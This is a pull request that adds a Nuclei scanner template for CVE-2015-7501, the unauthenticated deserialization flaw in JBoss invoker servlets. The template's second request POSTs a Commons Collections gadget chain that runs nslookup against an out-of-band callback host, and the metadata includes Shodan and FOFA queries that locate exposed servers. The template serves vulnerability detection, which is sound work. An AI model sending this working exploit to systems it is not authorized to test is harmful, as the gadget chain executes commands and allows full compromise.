### PR TITLE
CVE-2015-7501 - Red Hat JBoss - Insecure Deserialization

### DIFF
--- a/http/cves/2015/CVE-2015-7501.yaml
+++ b/http/cves/2015/CVE-2015-7501.yaml
@@ -1,0 +1,77 @@
+id: CVE-2015-7501
+
+info:
+  name: Red Hat JBoss - Insecure Deserialization
+  author: pdteam,DhiyaneshDk
+  severity: critical
+  description: |
+    Red Hat JBoss Application Server (4.x, 5.x, 6.x) contains an insecure deserialization vulnerability in the JMXInvokerServlet and EJBInvokerServlet HTTP Invoker endpoints. These endpoints deserialize arbitrary Java objects from unauthenticated HTTP POST requests. An attacker can send a crafted Apache Commons Collections gadget chain to achieve remote code execution. CVE-2015-7501 is the original 2015 FoxGlove Security disclosure of the Java Commons Collections deserialization vulnerability class.
+  impact: |
+    Unauthenticated remote code execution with JBoss service account privileges. Full system compromise possible including file access, credential theft, and lateral movement. Actively exploited by threat actors targeting legacy JBoss deployments.
+  remediation: |
+    Apply Red Hat Security Advisory RHSA-2015:2538. Upgrade to JBoss EAP 7.x which removes the affected invoker servlets. Restrict access to /invoker/* endpoints via jboss-web.xml security constraints. Update Apache Commons Collections to version 3.2.2 or 4.1 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-7501
+    - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
+    - https://access.redhat.com/security/vulnerabilities/986a8488-052e-46d1-8ede-c55cbfceb822
+    - https://github.com/ianxtianxt/CVE-2015-7501
+    - https://github.com/jas502n/Jboss_JMXInvokerServlet_Deserialization_RCE
+    - https://www.blackduck.com/blog/mitigate-java-deserialization-vulnerability-jboss.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2015-7501
+    cwe-id: CWE-502
+    epss-score: 0.8327
+    epss-percentile: 0.9970
+  metadata:
+    verified: true
+    max-request: 7
+    vendor: redhat
+    product: jboss_enterprise_application_platform
+    shodan-query: http.html:"/jmx-console/" http.title:JBoss
+    fofa-query: 'title="JBoss" && body="/jmx-console/"'
+  tags: cve2015,cve,jboss,rce,deserialization,java,kev,vulhub,redhat,oast,intrusive
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jmx-console/"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_any(tolower(body), "jboss", "jmx agent", "jmx-console", "j_security_check", "jboss.system", "jboss.deployment")'
+        internal: true
+
+  - raw:
+      - |
+        POST §endpoint§ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-java-serialized-object
+        Accept: application/x-java-serialized-object
+
+        {{generate_java_gadget("commons-collections3.1", "nslookup {{interactsh-url}}", "raw")}}
+
+    attack: clusterbomb
+
+    payloads:
+      endpoint:
+        - /invoker/JMXInvokerServlet
+        - /invoker/EJBInvokerServlet
+        - /invoker/readonly
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: dsl
+        dsl:
+          - 'contains_any(tolower(body), "classcastexception","jboss")'


### PR DESCRIPTION
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
